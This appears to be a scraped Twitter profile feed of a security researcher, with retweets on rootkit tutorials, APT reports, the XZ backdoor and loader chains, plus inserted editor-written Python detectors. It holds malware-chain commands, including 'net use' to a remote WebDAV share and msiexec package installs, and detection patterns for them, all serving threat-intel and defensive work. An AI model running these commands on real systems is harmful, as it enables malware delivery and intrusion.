TomU | I'm still here... til the end 🕊️🇨🇭 (@c_APT_ure), Twitter profile

#InfoSec professional, husband & father of two (in random order). #BlueTeam #DFIR #APT #CTI #RedTeaming #BSidesZH (RT/Likes ≠ endorsement) 👀➡️#MalwareChallenge

ID: 205435856

Website: http://c-apt-ure.blogspot.com/
Joined: 20-10-2010 21:56:04

14,3K Tweets

8,0K Followers

5,3K Following

0xor0ne (@0xor0ne):

Red teaming and adversary emulation: series on Windows rootkits development
Credits: Ido Veltzman (@Idov31)

Part 1: idov31.github.io/2022/07/14/lor…
Part 2: idov31.github.io/2022/08/04/lor…
Part 3: idov31.github.io/2022/10/30/lor…
Part 4: idov31.github.io/2023/02/24/lor…
Part 5: idov31.github.io/2023/07/19/lor…

#windows #infosec

Ax Sharma (@Ax_Sharma):

A GitHub flaw lets attackers upload executables that appear to be hosted on a company's official repo, such as Microsoft's—without the repo owner knowing anything about it.

The following URLs, for example, make it seem like these ZIPs are present on Microsoft's source code repo:

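As an added example (editor's code, not from the article above and not GitHub's own), a small classifier that separates github.com URLs backed by a repository's git history or releases from comment-attachment URLs that merely sit under an owner/repo path. The path layouts it recognises are the editor's understanding of GitHub's URL scheme and are an assumption to re-verify against current GitHub behaviour; every URL in `SAMPLE_URLS` is constructed, not one of the URLs from the article.

```python
"""Sort github.com URLs into repository content versus comment attachments.

Added example by the editor; it is not code from the article linked above.
The path layouts it recognises are the editor's understanding of how GitHub
serves files (an assumption to re-check against current GitHub behaviour),
and every URL in SAMPLE_URLS is constructed for illustration.
"""
from urllib.parse import urlsplit

GITHUB_HOSTS = {"github.com", "www.github.com"}
# Path kinds that are backed by the repository's own git history or releases.
REPO_CONTENT = {"blob", "raw", "tree", "releases", "archive", "commit"}


def classify(url: str) -> str:
    """Return 'repo-content', 'comment-attachment', 'not-github' or 'other'."""
    u = urlsplit(url)
    if u.netloc.lower() not in GITHUB_HOSTS:
        return "not-github"
    parts = [p for p in u.path.split("/") if p]
    # Newer upload form: /user-attachments/files/<id>/<name>; carries no repo name.
    if parts[:2] == ["user-attachments", "files"]:
        return "comment-attachment"
    if len(parts) < 3:
        return "other"
    kind = parts[2]
    # Older upload form: /<owner>/<repo>/files/<numeric id>/<name>. The owner and
    # repo in the path come from where the comment was typed, not from a commit.
    if kind == "files" and len(parts) >= 5 and parts[3].isdigit():
        return "comment-attachment"
    # Image/video uploads: /<owner>/<repo>/assets/<id>/<uuid>, same trust level.
    if kind == "assets" and len(parts) >= 5:
        return "comment-attachment"
    if kind in REPO_CONTENT:
        return "repo-content"
    return "other"


def borrows_repo_name(url: str) -> bool:
    """True when a comment attachment sits under an owner/repo path, i.e. the URL
    names a repository whose maintainers never committed the file."""
    parts = [p for p in urlsplit(url).path.split("/") if p]
    return classify(url) == "comment-attachment" and parts[:1] != ["user-attachments"]


SAMPLE_URLS = [  # constructed, not the URLs from the article
    "https://github.com/example-org/example-repo/releases/download/v1.0/tool.zip",
    "https://github.com/example-org/example-repo/blob/main/README.md",
    "https://github.com/example-org/example-repo/files/12345678/tool.zip",
    "https://github.com/example-org/example-repo/assets/1/0f0f0f0f-aaaa-bbbb-cccc-000000000000",
    "https://github.com/user-attachments/files/12345678/tool.zip",
    "https://example.com/example-org/example-repo/files/12345678/tool.zip",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        flag = " (repo name borrowed)" if borrows_repo_name(url) else ""
        print(f"{classify(url):18} {url}{flag}")
```

The practical use is in an allow-list or proxy log review: a download that passes a "github.com/<trusted-org>/" string match still needs `classify()` to say `repo-content` before the org name means anything.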
Dennis (@DennisF):

'The most obvious sort of pivotal moment to me is their movement into wartime operations.' Gabby Roncone 🇺🇦 🇵🇸

A Decade of Sandworm: Digging into APT44’s Past and Future decipher.sc/a-decade-of-sa… sec

mRr3b00t (@UK_Daniel_Card):

Want to know how to actually defend your business? Here's this one simple trick....

It's called PLANNING and following a sensible process! I know, THIS SECRET can be yours:

head to:

pwndefend.com for more SECRET cyber TIPS!

Jason Haddix (@Jhaddix):

A 13 year old coded a botnet control framework that utilizes pastebin and github for control of hosts in red teaming…

This makes the hacker in me so hopeful.

Check out pastebomb when it’s dropped!

Thomas Roccia 🤘 (@fr0gger_):

I just came across a tool called AttackGen. It's a simple tool that generates incident scenarios based on a Threat Actor and suggests simulations and possible detections at a high level. #llm #python #threatintel

👉 code: github.com/mrwadams/attac…
👉 app: attackgen.streamlit.app

Cryptolaemus (@Cryptolaemus1):

#SSLoad - #TA578 - url > .js > smb > .msi

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6[.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOCs
github.com/pr0xylife/SSLo…

Virus Bulletin (@virusbtn):

Splunk researchers look into the tactics, techniques and procedures employed by APT29 in a recent campaign. The attack chain begins with a spear-phishing email leading to the delivery of the WINELOADER backdoor. splunk.com/en_us/blog/sec…

Cryptolaemus (@Cryptolaemus1):

#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll

wscript Invoice_818493.js

wscript out.js

C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇

\npp.8.6.3.portable.x64\plugins\mimeTools.dll

(1/3) 👇

IOCs
github.com/pr0xylife/Wiki…

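Added by the editor as an example, not code from either Cryptolaemus thread or from the pr0xylife IOC repository: a small process-telemetry triage that covers both chains above, the SSLoad .js > `net use` over WebDAV > msiexec chain and the WikiLoader .js > .js > sideloaded plugin DLL chain. The event fields (`kind`, `image`, `cmdline`, `parent`, `loaded`) are an assumption to map onto your Sysmon or EDR schema. `SAMPLE_EVENTS` is constructed telemetry: the script and DLL file names are the ones shown in the threads, while the WebDAV host, user name and parent processes are placeholders.

```python
"""Triage of the two script > loader chains in the threads above (SSLoad via
WebDAV + msiexec, WikiLoader via a two-stage .js and a DLL sideload).

Added example by the editor, not code from the cited threads. The event
schema (kind/image/cmdline/parent/loaded) is an assumption; map it onto your
Sysmon or EDR fields. SAMPLE_EVENTS is constructed: the WebDAV host, user
name and parent processes are placeholders, not IOCs from the threads.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Paths a standard user can write to; scripts and loaders in both chains live here.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(downloads|appdata\\local\\temp)|programdata)\\", re.I)
# \\host@80\share or \\host@SSL@443\share is the WebDAV mini-redirector syntax.
WEBDAV_UNC = re.compile(r"\\\\[\w.\-]+@(ssl@)?\d+\\", re.I)
NET_USE = re.compile(r"^\s*net1?(?:\.exe)?\s+use\s+([a-z]:)\s+(\\\\\S+)", re.I)
SCRIPT_ARG = re.compile(r'"?([^"\s]+\.(?:jse|js|vbe|vbs|wsf))"?(?=\s|$)', re.I)


@dataclass
class Event:
    kind: str           # "process" (creation) or "imageload"
    image: str          # full path of the process image
    cmdline: str = ""   # process events only
    parent: str = ""    # parent image file name, process events only
    loaded: str = ""    # DLL path, imageload events only


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: list[Event]) -> list[Finding]:
    findings: list[Finding] = []
    mapped: dict[str, str] = {}  # drive letter -> UNC path seen in `net use`
    for ev in events:
        name = basename(ev.image)
        if ev.kind == "process" and name in SCRIPT_HOSTS:
            m = SCRIPT_ARG.search(ev.cmdline)
            # A bare script name or a script under a user-writable directory is
            # the phishing-delivery shape; both chains start this way.
            if m and ("\\" not in m.group(1) or USER_WRITABLE.search(m.group(1))):
                findings.append(Finding("script_host_user_writable", m.group(1)))
            if ev.parent.lower() in SCRIPT_HOSTS:  # wscript -> wscript (the out.js stage)
                findings.append(Finding("script_host_chain", f"{ev.parent} -> {ev.cmdline}"))
        elif ev.kind == "process" and name in {"net.exe", "net1.exe"}:
            m = NET_USE.match(ev.cmdline)
            if m:
                drive, unc = m.group(1).upper(), m.group(2)
                mapped[drive] = unc
                if WEBDAV_UNC.search(unc):
                    findings.append(Finding("webdav_drive_mapping", f"{drive} -> {unc}"))
        elif ev.kind == "process" and name == "msiexec.exe":
            cl = ev.cmdline
            # Correlate: a package on a drive mapped over WebDAV earlier in the log,
            # a WebDAV UNC package path, or msiexec launched straight from a script host.
            via_mapped = any(re.search(rf"\b{d}\\", cl, re.I) and WEBDAV_UNC.search(u)
                             for d, u in mapped.items())
            if via_mapped or WEBDAV_UNC.search(cl) or ev.parent.lower() in SCRIPT_HOSTS:
                findings.append(Finding("msiexec_remote_package", cl))
        elif ev.kind == "imageload":
            # An executable dropped in a user-writable directory loading a DLL from a
            # user-writable directory is the sideload shape (portable notepad++ + plugin).
            if USER_WRITABLE.search(ev.image) and USER_WRITABLE.search(ev.loaded):
                findings.append(Finding("dll_sideload_candidate",
                                        f"{basename(ev.image)} loaded {ev.loaded}"))
    return findings


SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    # SSLoad-style chain: .js -> net use over WebDAV -> msiexec from the mapped drive
    Event("process", r"C:\Windows\System32\wscript.exe",
          r"wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js", parent="explorer.exe"),
    Event("process", r"C:\Windows\System32\net.exe",
          r"net use A: \\dav.example@80\share\ /persistent:no", parent="wscript.exe"),
    Event("process", r"C:\Windows\System32\msiexec.exe",
          r"msiexec.exe /I A:\avp.msi", parent="cmd.exe"),
    # WikiLoader-style chain: .js -> .js -> portable notepad.exe sideloading a plugin DLL
    Event("process", r"C:\Windows\System32\wscript.exe",
          r'wscript "C:\Users\Admin\Downloads\Invoice_818493.js"', parent="explorer.exe"),
    Event("process", r"C:\Windows\System32\wscript.exe",
          r'wscript "C:\Users\Admin\AppData\Local\Temp\out.js"', parent="wscript.exe"),
    Event("imageload", r"C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe",
          loaded=r"C:\Users\Admin\AppData\Local\Temp\npp.8.6.3.portable.x64\plugins\mimeTools.dll"),
    # Benign noise that must not fire
    Event("process", r"C:\Windows\System32\msiexec.exe",
          r'msiexec.exe /i "C:\Users\Admin\Downloads\VendorSetup.msi"', parent="explorer.exe"),
    Event("imageload", r"C:\Program Files\Notepad++\notepad++.exe",
          loaded=r"C:\Program Files\Notepad++\plugins\mimeTools\mimeTools.dll"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:28} {f.detail}")
```

The `net use` state kept in `mapped` is what makes the msiexec rule useful: `msiexec /I A:\avp.msi` looks like a normal local install until you know A: was mapped to a WebDAV share on port 80 a moment earlier, so the rule needs the drive-mapping event in the same stream rather than a per-event match.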
Nicolas Krassas (@Dinosn):

Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware thehackernews.com/2024/04/critic…

Juliano Rizzo (@julianor):

🔎Researchers are working hard but still need to conclude the XZ backdoor analysis and determine whether it has alternative communication channels or triggers.
🎁The xz-min project by Felipe Contreras (@felipec) is a way to easily reproduce the XZ backdoor to study it:
github.com/felipec/xz-min

Eugene Kaspersky (@e_kaspersky):

XZ backdoor story – Initial analysis.

Unlike other supply chain attacks we have seen in Node.js, PyPI, FDroid, and the Linux Kernel that mostly consisted of atomic malicious patches, fake packages and typosquatted package names, this incident was a multi-stage operation that

Zach (@svch0st):

🎁 Today I'm giving away 3 of our DFIR Labs! 🎁

To enter:
✅Follow me
✅RT & Like this post
✅Reply with which case you'd like to take

The winners will be selected in 24 hours.
